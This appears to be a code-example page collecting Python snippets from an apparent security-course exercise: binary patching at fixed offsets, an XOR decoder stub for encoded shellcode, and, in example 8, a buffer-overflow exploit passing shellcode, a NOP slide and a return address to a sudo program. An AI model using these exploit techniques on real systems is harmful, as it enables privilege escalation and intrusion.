Exemplo n.º 1
0
def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()
    data_list = list(data)
    first_patch = assemble.assemble_file("patch1.asm")
    second_patch = assemble.assemble_file("patch2.asm")
    for i in range(len(first_patch)):
        data_list[i + 0x635] = first_patch[i]
    for i in range(len(second_patch)):
        data_list[i + 0x5CD] = second_patch[i]
    data = "".join(data_list)
    with open(path + '.patched', 'wb') as writer:
        writer.write(data)
Exemplo n.º 2
0
def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()
    Ldata = list(data)
    patch1 = assemble.assemble_file("patch1.asm")
    patch2 = assemble.assemble_file("patch2.asm")
    for i in range(len(patch1)):
        Ldata[0x633 + i] = patch1[i]
    for j in range(len(patch2)):
        Ldata[0x5d0 + j] = patch2[j]
    data = "".join(Ldata)
    with open(path + '.patched', 'wb') as writer:
        writer.write(data)
Exemplo n.º 3
0
def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()
    data_list = list(data)
    replacement_list = list(assemble.assemble_file("patch1.asm"))
    for i in range(len(replacement_list)):
        data_list[0x633 + i] = replacement_list[i]
    replacement_list = list(assemble.assemble_file("patch2.asm"))
    for i in range(len(replacement_list)):
        data_list[0x5cd + i] = replacement_list[i]
    data = "".join(data_list)
    with open(path + '.patched', 'wb') as writer:
        writer.write(data)
Exemplo n.º 4
0
def get_decoder(indices):
    decoder_file = open("decoder.asm", "w")
    # get eax to point to the start of the encoded shellcode
    decoder_file.write("push esp\n") #option 1
    decoder_file.write("pop eax\n")
    for i in range(165):
    	decoder_file.write("dec eax\n")		#	 161 is the len of the shellcode, 4 is to the ra.	
    #decoder_file.write("add eax, 0x6f6f6f6c\n") # option 2 (option 1 is better because it will work in every os, dynamic addresses)
    #decoder_file.write("add eax, 0x507f716f\n")
   	#decoder_file.write("add eax, 0x110000\n") # #now points to the start of the encoded shellcode (suppose to be 0xbfffe0db)

    # get bl = 0xff
    decoder_file.write("push 0\n")
    decoder_file.write("pop ebx\n")
    decoder_file.write("dec ebx\n")
    ###
    decoder_file.write("push 0\n")
    decoder_file.write("pop edx\n") # counter for the index
    EDX=0
    for offset in indices:
        if offset==0:
            decoder_file.write("xor byte ptr [EAX + 0], bl\n")
            decoder_file.write("inc edx\n")
            EDX+=1
            continue
        while EDX<offset:
            decoder_file.write("inc edx\n")
            EDX+=1
        decoder_file.write("xor byte ptr [EAX + EDX], bl" +'\n')
    decoder_file.close()
    return assemble.assemble_file("decoder.asm")
Exemplo n.º 5
0
def get_shellcode():
    '''This function returns the machine code (bytes) of the shellcode.
    
    This does not include the size, return address, nop slide or anything else!
    From this function you should return only the shellcode!
    '''
    shellcode = assemble.assemble_file(PATH_TO_SHELLCODE)
    return shellcode
Exemplo n.º 6
0
def patch_program(path):
    with open(path, 'rb') as reader:
        data = reader.read()

    small_dead_zone_begin_offset = 0x633
    small_dead_zone_end_offset = 0x63A
    large_dead_zone_begin_offset = 0x5CD
    large_dead_zone_end_offset = 0x631

    patch1_bin = assemble.assemble_file(patch1_path)
    patch1_len = len(patch1_bin)
    patch2_bin = assemble.assemble_file(patch2_path)
    patch2_len = len(patch2_bin)

    # patch small dead zone
    data = data[:small_dead_zone_begin_offset] + str(
        patch1_bin) + data[small_dead_zone_begin_offset + patch1_len:]
    # patch large dead zone
    data = data[:large_dead_zone_begin_offset] + str(
        patch2_bin) + data[large_dead_zone_begin_offset + patch2_len:]

    with open(path + '.patched', 'wb') as writer:
        writer.write(data)
Exemplo n.º 7
0
def get_shellcode():
    return assemble.assemble_file("shellcode.asm")
Exemplo n.º 8
0
def run_shell():
    trash = assemble.assemble_file("shellcode.asm")
    password = '******' * 11 + trash + (56 -
                                      len(trash)) * '\x90' + "\x44\xe0\xff\xbf"
    subprocess.call([PATH_TO_SUDO, password, "ls"])
Exemplo n.º 9
0
def get_shellcode():
    shellcode = assemble.assemble_file(PATH_TO_SHELLCODE)
    return shellcode
Exemplo n.º 10
0
def get_shellcode():

    trash = assemble.assemble_file(PATH_TO_SHELLCODE)
    return trash